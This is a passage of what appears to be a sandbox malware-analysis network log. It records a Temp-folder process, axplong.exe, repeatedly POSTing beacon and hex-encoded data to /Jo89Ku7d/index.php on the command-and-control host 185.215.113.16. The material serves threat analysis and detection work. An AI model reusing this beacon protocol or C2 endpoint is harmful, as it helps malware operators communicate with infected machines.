                        Sep 26, 2024 15:42:10.918925047 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:10 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        7192.168.2.652327185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:11.034682989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:11.746453047 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:11.749627113 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:11.977494955 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:11 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        8192.168.2.652328185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:12.096718073 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:12.825663090 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:12 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:12.826402903 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:13.132277012 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        9192.168.2.652329185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:13.253243923 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:13.999247074 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:13 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:14.000117064 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:14.223839045 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.652330185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:14.331346989 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:15.051147938 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:14 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:15.051896095 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:15.282052994 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:15 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.652331185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:15.411087990 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:16.301153898 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:16 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:16.301928997 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:16.588774920 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:16 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        12192.168.2.652332185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:16.706948996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:17.627240896 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:17.627991915 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:17.858223915 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:17 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        13192.168.2.652333185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:17.978853941 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:18.756419897 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:18.757503986 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:18.986959934 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:18 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        14192.168.2.652334185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:19.096788883 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:19.846638918 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:19.847347021 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:20.087435961 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:19 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        15192.168.2.652335185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:20.208187103 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:20.926371098 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:20 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:20.927572966 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:21.175602913 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        16192.168.2.652336185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:21.284813881 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:22.017019033 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:21 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:22.017832994 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:22.249780893 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        17192.168.2.652337185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:22.362879038 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:23.112827063 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:22 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:23.113713026 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                        Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                        Sep 26, 2024 15:42:23.345959902 CEST196INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:23 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 7 <c><d>0


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        18192.168.2.652338185.215.113.16806392C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                        TimestampBytes transferredDirectionData
                        Sep 26, 2024 15:42:23.457170963 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 4
                        Cache-Control: no-cache
                        Data Raw: 73 74 3d 73
                        Data Ascii: st=s
                        Sep 26, 2024 15:42:24.193552017 CEST219INHTTP/1.1 200 OK
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Thu, 26 Sep 2024 13:42:24 GMT
                        Content-Type: text/html; charset=UTF-8
                        Transfer-Encoding: chunked
                        Connection: keep-alive
                        Refresh: 0; url = Login.php
                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                        Data Ascii: 1 0
                        Sep 26, 2024 15:42:24.194499016 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                        Content-Type: application/x-www-form-urlencoded
                        Host: 185.215.113.16
                        Content-Length: 160
                        Cache-Control: no-cache
                        Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
